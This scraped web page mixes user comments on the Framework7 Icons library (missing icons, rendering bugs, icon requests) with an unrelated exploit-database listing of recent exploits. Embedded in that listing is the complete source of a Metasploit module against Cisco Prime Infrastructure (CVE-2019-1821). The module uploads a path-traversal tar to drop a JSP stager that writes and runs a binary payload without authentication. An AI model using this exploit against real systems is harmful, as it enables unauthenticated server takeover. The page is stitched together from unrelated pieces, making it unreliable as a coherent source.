<f7-icon slot="media" f7="calendar"></f7-icon>

Is missing

Hi,
I have problem with icons in F7. When I test icons in my browser, emulator, android device(4.4.4 Samsung Galaxy Ace 4) everything works fine, but on my friends tablet icons dont show up, same thing happends in phonegap developer app. I did everything that is specified in README.md file.

Code

<div class="right">
            <a href="#" id="change-view" class="link icon-only" style="margin: 0">
                <i class="f7-icons" style="font-size: 20px;width: 20px;color: #fff;margin: 0">photos</i>
              </a>
              <a href="#" id="open-close-search" class="link icon-only search-icon" style="margin: 0">
                <i class="f7-icons" style="font-size: 20px;width: 20px;color: #fff;margin: 0">search</i>
              </a>
</div>

Images

My friends tablet

My phone

I guess it adds a shipping icon that is good for delivery, like a truck or a ship.

Hey cool set, just an idea add emoji/sticker icon
WhatsApp have something like this for emoji, gifs and sticker

hello vladimir, got updates on icons?

There errors in console, CORS errors in the F7 icons documentation page: see it here

Because of that, icons are not getting displayed.

Hope it helps.

Hi,
is it possible to add a funnel / funnel_slash icon?

Would be great to add some social logo icons, like whatsapp, linkedin, facebook only "F".
I usually copy svg from here: https://icons.getbootstrap.com but would be better have them as webfont icons. Thanks.

Please add QR code and barcode in framework7 icon.

Shift the position of the icon from one group. Best practice is to use the set and maybe this is not a mistake.

Some react icons seem to be missing style mapping causing this error:

Error

The `style` prop expects a mapping from style properties to values, not a string. For example, style={{marginRight: spacing + 'em'}} when using JSX.

Here's a demo of the issue. Airplane renders correctly, but PersonAltCircle does not.

So it's amazing, but with delivery (bike delivery, motocycle delivery) icons it will be most better than ever!!

Already reported this here and it was fixed for the specific case described below, how ever this is still an issue in version 5.0.5, for other icons. I do not know exactly for which icon this happens, but the usecase is that I'm trying to render out all of the icons and I see this error for some of them. Until it's fixed for all of them, I cannot use this library for my usecase.

Some react icons seem to be missing style mapping causing this error:

Error

The `style` prop expects a mapping from style properties to values, not a string. For example, style={{marginRight: spacing + 'em'}} when using JSX.

Here's a demo of the issue. Airplane renders correctly, but PersonAltCircle does not.

Some icons are broken on iOS. Specifically this seems to affect some outline icons. I'm using iOS 10.1.1
Attaching screenshots of the ones I've spotted

Ive gotten the "included" icons to work fine (back and bars but Im having a hard time just getting started with the rest of the icon set. I have my fonts folder in my project, I edited the "urls" in framework7-icons.css to point correctly, Ive added the <link rel="stylesheet" href="path...to...framework7/framework7-icons.css">. Ive tried using the icons in the following way:

<div class="toolbar tabbar">
    <div class="toolbar-inner">
        <a href="#tab1" class="tab-link active">
            <i class="f7-icons"></i>
        </a>
        <a href="#tab2" class="tab-link">
            <i class="icon f7-icons"></i>
        </a>
        <a href="#tab3" class="tab-link">
            <i class="f7-icons add"></i>
        </a>
        <a href="/game" class="tab-link">
            <i class="icon icon-bars"></i>
        </a>
    </div>
</div>

Ive tried extracting the actual icons (no direction here where this should go) both to the fonts folder and the dist/img folder. No dice whatsoever.

Any clue as to what Im missing here?

Thanks.

Where i use f7-icons, add class email and email-fill, but it's not work

I noticed mic and mic slash and expected video and video_slash icon to be there. Kindly, is it possible to add that to the library. Currently using svg for video and video_slash alone.... rest of the app was built using the framework7-icons. Kudos!

Latest Exploits

EA Origin < 10.5.38 - Remote Code Execution

WINDOWS / REMOTE

Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)

LINUX / LOCAL

Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)

LINUX / REMOTE

# This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => 'Cisco Prime Infrastructure Health Monitor TarArchive Directory Traversal Vulnerability', 'Description' => %q{ This module exploits a vulnerability found in Cisco Prime Infrastructure. The issue is that the TarArchive Java class the HA Health Monitor component uses does not check for any directory traversals while unpacking a Tar file, which can be abused by a remote user to leverage the UploadServlet class to upload a JSP payload to the Apache Tomcat's web apps directory, and gain arbitrary remote code execution. Note that authentication is not required to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'Steven Seeley', # Original discovery, PoC 'sinn3r' # Metasploit module ], 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Targets' => [ [ 'Cisco Prime Infrastructure 3.4.0.0', { } ] ], 'References' => [ ['CVE', '2019-1821'], ['URL', 'https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html'], ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce'], ['URL', 'https://srcincite.io/advisories/src-2019-0034/'], ['URL', 'https://srcincite.io/pocs/src-2019-0034.py.txt'] ], 'DefaultOptions' => { 'RPORT' => 8082, 'SSL' => true, }, 'Notes' => { 'SideEffects' => [ IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ] }, 'Privileged' => false, 'DisclosureDate' => 'May 15 2019', 'DefaultTarget' => 0)) register_options( [ OptPort.new('WEBPORT', [true, 'Cisco Prime Infrastructure web interface', 443]), OptString.new('TARGETURI', [true, 'The route for Cisco Prime Infrastructure web interface', '/']) ]) end class CPITarArchive attr_reader :data attr_reader :jsp_name attr_reader :tar_name attr_reader :stager attr_reader :length def initialize(name, stager) @jsp_name = "#{name}.jsp" @tar_name = "#{name}.tar" @stager = stager @DaTa = make @Length = data.length end def make data = '' path = "../../opt/CSCOlumos/tomcat/webapps/ROOT/#{jsp_name}" tar = StringIO.new Rex::Tar::Writer.new(tar) do |t| t.add_file(path, 0644) do |f| f.write(stager) end end tar.seek(0) data = tar.read tar.close data end end def check res = send_request_cgi({ 'rport' => datastore['WEBPORT'], 'SSL' => true, 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'webacs', 'pages', 'common', 'login.jsp') }) unless res vprint_error('No response from the server') return CheckCode::Unknown end if res.code == 200 && res.headers['Server'] && res.headers['Server'] == 'Prime' return CheckCode::Detected end CheckCode::Safe end def get_jsp_stager(out_file, bin_data) # For some reason, some of the bytes tend to get lost at the end. # Not really sure why, but some extra bytes are added to ensure the integrity # of the code. This file will get deleted during cleanup anyway. %Q|<%@ page import="java.io.*" %> <% String data = "#{Rex::Text.to_hex(bin_data, '')}"; FileOutputStream outputstream = new FileOutputStream("#{out_file}"); int numbytes = data.length(); byte[] bytes = new byte[numbytes/2]; for (int counter = 0; counter < numbytes; counter += 2) { char char1 = (char) data.charAt(counter); char char2 = (char) data.charAt(counter + 1); int comb = Character.digit(char1, 16) & 0xff; comb <<= 4; comb += Character.digit(char2, 16) & 0xff; bytes[counter/2] = (byte)comb; } outputstream.write(bytes); outputstream.close(); try { Runtime.getRuntime().exec("chmod +x #{out_file}"); Runtime.getRuntime().exec("#{out_file}"); } catch (IOException exp) {} %>#{Rex::Text.rand_text_alpha(30)}| end def make_tar elf_name = "/tmp/#{Rex::Text.rand_text_alpha(10)}.bin" register_file_for_cleanup(elf_name) elf = generate_payload_exe(code: payload.encoded) jsp_stager = get_jsp_stager(elf_name, elf) tar_name = Rex::Text.rand_text_alpha(10) register_file_for_cleanup("apache-tomcat-8.5.16/webapps/ROOT/#{tar_name}.jsp") CPITarArchive.new(tar_name, jsp_stager) end def execute_payload(tar) # Once executed, we are at: # /opt/CSCOlumos send_request_cgi({ 'rport' => datastore['WEBPORT'], 'SSL' => true, 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, tar.jsp_name) }) end def upload_tar(tar) post_data = Rex::MIME::Message.new post_data.add_part(tar.data, nil, nil, "form-data; name="files"; filename="#{tar.tar_name}"") # The file gets uploaded to this path on the server: # /opt/CSCOlumos/apache-tomcat-8.5.16/webapps/ROOT/tar_name.jsp res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'servlet', 'UploadServlet'), 'data' => post_data.to_s, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'headers' => { 'Destination-Dir' => 'tftpRoot', 'Compressed-Archive' => 'false', 'Primary-IP' => '127.0.0.1', 'Filecount' => '1', 'Filename' => tar.tar_name, 'FileSize' => tar.length } }) (res && res.code == 200) end def exploit tar = make_tar print_status("Uploading tar file (#{tar.length} bytes)") if upload_tar(tar) print_status('Executing JSP stager...') execute_payload(tar) else print_status("Failed to upload #{tar.tar_name}") end end end

Linux - Use-After-Free via race Between modify_ldt() and #BR Exception

LINUX / DOS

BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection

ASPX / WEBAPPS

WebERP 4.15 - SQL injection

PHP / WEBAPPS

Tuneclone 2.20 - Local SEH Buffer Overflow

WINDOWS / LOCAL

BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Execution

ASPX / WEBAPPS

BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Execution

ASPX / WEBAPPS

Serv-U FTP Server < 15.1.7 - Local Privilege Escalation

LINUX / LOCAL

Sahi pro 8.x - Cross-Site Scripting

MULTIPLE / WEBAPPS

Sahi pro 8.x - SQL Injection

MULTIPLE / WEBAPPS

Sahi pro 7.x/8.x - Directory Traversal

MULTIPLE / WEBAPPS

Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow

MULTIPLE / DOS

Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow

MULTIPLE / DOS

Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow

MULTIPLE / DOS

Thunderbird ESR < 60.7.XXX - Type Confusion

MULTIPLE / DOS

Spring Security OAuth - Open Redirector

JAVA / WEBAPPS

AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit)

PHP / REMOTE

Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell)

WINDOWS / LOCAL

Netperf 2.6.0 - Stack-Based Buffer Overflow

LINUX / DOS

Exim 4.87 - 4.91 - Local Privilege Escalation

LINUX / LOCAL

HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write

WINDOWS / DOS

CleverDog Smart Camera DOG-2W / DOG-2W-V4 - Multiple Vulnerabilities

HARDWARE / WEBAPPS

RedwoodHQ 2.5.5 - Authentication Bypass

MULTIPLE / WEBAPPS

Aida64 6.00.5100 - 'Log to CSV File' Local SEH Buffer Overflow

WINDOWS / LOCAL

CentOS 7.6 - 'ptrace_scope' Privilege Escalation

LINUX / LOCAL

Pronestor Health Monitoring < 8.1.11.0 - Privilege Escalation

WINDOWS / LOCAL

Sitecore 8.x - Deserialization Remote Code Execution

ASPX / WEBAPPS

FusionPBX 4.4.3 - Remote Command Execution

PHP / WEBAPPS

Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)

LINUX / REMOTE

Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting

JSP / WEBAPPS

phpMyAdmin 4.8 - Cross-Site Request Forgery

PHP / WEBAPPS

WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution

PHP / WEBAPPS

ProShow 9.0.3797 - Local Privilege Escalation

WINDOWS / LOCAL

Ubuntu 18.04 - 'lxd' Privilege Escalation

LINUX / LOCAL

UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting

PHP / WEBAPPS

Microsoft Windows - AppX Deployment Service Local Privilege Escalation (3)

WINDOWS / LOCAL

Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion

HARDWARE / WEBAPPS

Exim 4.87 < 4.91 - (Local / Remote) Command Execution

LINUX / REMOTE

LibreNMS - addhost Command Injection (Metasploit)

LINUX / REMOTE

IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)

WINDOWS / REMOTE

Google Chrome 73.0.3683.103 - 'WasmMemoryObject::Grow' Use-After-Free

MULTIPLE / DOS

Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery

JSP / WEBAPPS

Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution

LINUX / LOCAL

Zoho ManageEngine ServiceDesk Plus 9.3 - 'PurchaseRequest.do' Cross-Site Scripting

JAVA / WEBAPPS

Zoho ManageEngine ServiceDesk Plus 9.3 - 'SearchN.do' Cross-Site Scripting

JAVA / WEBAPPS

Zoho ManageEngine ServiceDesk Plus 9.3 - 'SolutionSearch.do' Cross-Site Scripting

JAVA / WEBAPPS

Zoho ManageEngine ServiceDesk Plus 9.3 - 'SiteLookup.do' Cross-Site Scripting

JAVA / WEBAPPS

DVD X Player 5.5 Pro - Local Buffer Overflow (SEH)

WINDOWS / LOCAL

Cisco RV130W 1.0.3.44 - Remote Stack Overflow

HARDWARE / REMOTE

NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow

HARDWARE / REMOTE

IceWarp 10.4.4 - Local File Inclusion

PHP / WEBAPPS

Nvidia GeForce Experience Web Helper - Command Injection

WINDOWS / LOCAL

WordPress Plugin Form Maker 1.13.3 - SQL Injection

PHP / WEBAPPS

AUO Solar Data Recorder < 1.3.0 - Incorrect Access Control

HARDWARE / WEBAPPS

KACE System Management Appliance (SMA) < 9.0.270 - Multiple Vulnerabilities

PHP / WEBAPPS

Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service

WINDOWS / DOS

Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)

JAVA / REMOTE

Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL

ANDROID / DOS

Spidermonkey - IonMonkey Unexpected ObjectGroup in ObjectGroupDispatch Operation

MULTIPLE / DOS

Spidermonkey - IonMonkey Leaks JS_OPTIMIZED_OUT Magic Value to Script

MULTIPLE / DOS

Free SMTP Server 2.5 - Denial of Service (PoC)

WINDOWS / DOS

pfSense 2.4.4-p3 (ACME Package 0.59_14) - Persistent Cross-Site Scripting

PHP / WEBAPPS

Phraseanet < 4.0.7 - Cross-Site Scripting

MULTIPLE / WEBAPPS

Petraware pTransformer ADC < 2.1.7.22827 - Login Bypass

WINDOWS / REMOTE

EquityPandit 1.0 - Password Disclosure

ANDROID / LOCAL

Typora 0.9.9.24.6 - Directory Traversal

MACOS / REMOTE

Deltek Maconomy 2.2.5 - Local File Inclusion

MULTIPLE / WEBAPPS

Pidgin 2.13.0 - Denial of Service (PoC)

WINDOWS / DOS

Fast AVI MPEG Joiner - 'License Name' Denial of Service (PoC)

WINDOWS / DOS

Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption

WINDOWS / REMOTE

Cyberoam General Authentication Client 2.1.2.7 - 'Server Address' Denial of Service (PoC)

WINDOWS / DOS

Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC)

WINDOWS / DOS

Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC)

WINDOWS / DOS

Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)

WINDOWS / DOS

Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)

WINDOWS / DOS

Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow

WINDOWS / LOCAL

Opencart 3.0.3.2 - 'extension/feed/google_base' Denial of Service PoC

PHP / WEBAPPS

Microsoft Windows - AppX Deployment Service Local Privilege Escalation (2)

WINDOWS / LOCAL

Microsoft Windows 10 (17763.379) - Install DLL

WINDOWS / LOCAL

Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)

PHP / REMOTE

Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)

MACOS / LOCAL

Visual Voicemail for iPhone - IMAP NAMESPACE Processing Use-After-Free

IOS / DOS

Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation

WINDOWS / LOCAL

Terminal Services Manager 3.2.1 - Denial of Service

WINDOWS / DOS

Nagios XI 5.6.1 - SQL injection

PHP / WEBAPPS

NetAware 1.20 - 'Share Name' Denial of Service (PoC)

WINDOWS / DOS

NetAware 1.20 - 'Add Block' Denial of Service (PoC)

WINDOWS / DOS

Microsoft Internet Explorer 11 - Sandbox Escape

WINDOWS / LOCAL

Microsoft Windows (x84) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation

WINDOWS / LOCAL

Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation

WINDOWS / LOCAL

Horde Webmail 5.2.22 - Multiple Vulnerabilities

PHP / WEBAPPS

TapinRadio 2.11.6 - 'Uername' Denial of Service (PoC)

WINDOWS / DOS

TapinRadio 2.11.6 - 'Address' Denial of Service (PoC)

WINDOWS / DOS

RarmaRadio 2.72.3 - 'Username' Denial of Service (PoC)

WINDOWS / DOS

RarmaRadio 2.72.3 - 'Server' Denial of Service (PoC)

WINDOWS / DOS

Carel pCOWeb < B1.2.1 - Credentials Disclosure

HARDWARE / WEBAPPS

Carel pCOWeb < B1.2.1 - Cross-Site Scripting

HARDWARE / WEBAPPS

AUO Solar Data Recorder < 1.3.0 - 'addr' Cross-Site Scripting

HARDWARE / WEBAPPS

The README.md as an example uses the icon name "home". With the update to the new symbols this name doesn't exist anymore, therefore the example fails. I suggest using another name like "house".

<i class="f7-icons">house</i>

Hi,

I'm using Framework7 + Vue + Webpack template
I'm unable to get placemark and placemark_fill icons ...
I've downloaded latest font from git but still doesn't works.

Can you give me an hand?

Regards

helo

Is possible to add another icon? i have download svg icon from flatico, what should i do to add new shv icon?

Maybe this is an interesting example as well for the README:

.f7-icons, [data-icon]:before {
    font-family: 'Framework7 Icons';
    font-weight: normal;
    font-style: normal;
    /* font-size: 28px; */
    line-height: 1;
    letter-spacing: normal;
    text-transform: none;
    display: inline-block;
    white-space: nowrap;
    word-wrap: normal;
    direction: ltr;
    -webkit-font-smoothing: antialiased;
    text-rendering: optimizeLegibility;
    -moz-osx-font-smoothing: grayscale;
    -webkit-font-feature-settings: "liga";
    -moz-font-feature-settings: "liga=1";
    -moz-font-feature-settings: "liga";
    font-feature-settings: "liga";
    text-align: center;
    color: transparent;
  }

  [data-icon]:before {
    content: attr(data-icon);
    color: inherit;
  }

In HTML:

<i data-icon="house"></i>

The menu icon is actually showing a list icon, not the expected "hamburger" that the whole world uses.

Wrong

Right

May you kindly add the following icons as crypto apps are gaining popularity

1. Wallet
2. Tractor
3. Double Tick (REF: checkmark_alt)
4. Bank

These icons are really similar to Apple SF symbols, is it authorized to use them for an Android app?
The website says:

The font is developed to be used with Framework7, but you can use it wherever you see it fits, personal or commercial. It is free to use and licensed under MIT. The font can be downloaded at the Framework7 Icons repository.

I wanted to double check it's safe to use them in an Android app.
Thanks

When using TS in vue i got this issue:

Hi,

The chat icon shows up correct on web but on simulator and device it always has a fill, i.e. as chat_fill. (Also, when using chats icon one gets one "bubble" with fill and one without.) Any idea how to get a chat icon without fill?

Thanks.

Peter

Hi Vladimir,

There are issues with older browsers / Android versions to display ligatures (see google/material-design-lite#1375).

For Material icons, there is a mapping file for code:
https://github.com/google/material-design-icons/blob/master/iconfont/codepoints

Is there anything similar for Framework7-icons?

Regards,

This is completely up to you of course and obviously more icons are supported through fonts like material-icons, but imho for web/desktop apps, the following icons would be nice to have:

• shopping cart or basket icon
• print (send to actual printer, but also store as pdf or alike)

reason

if browsers disabling/not supporting custom fonts, it will look like this:

it doesnt even hide overflow text

Still 0.8 on npmjs!

The current camera_fill icon is:

My expected camera_fill icon is: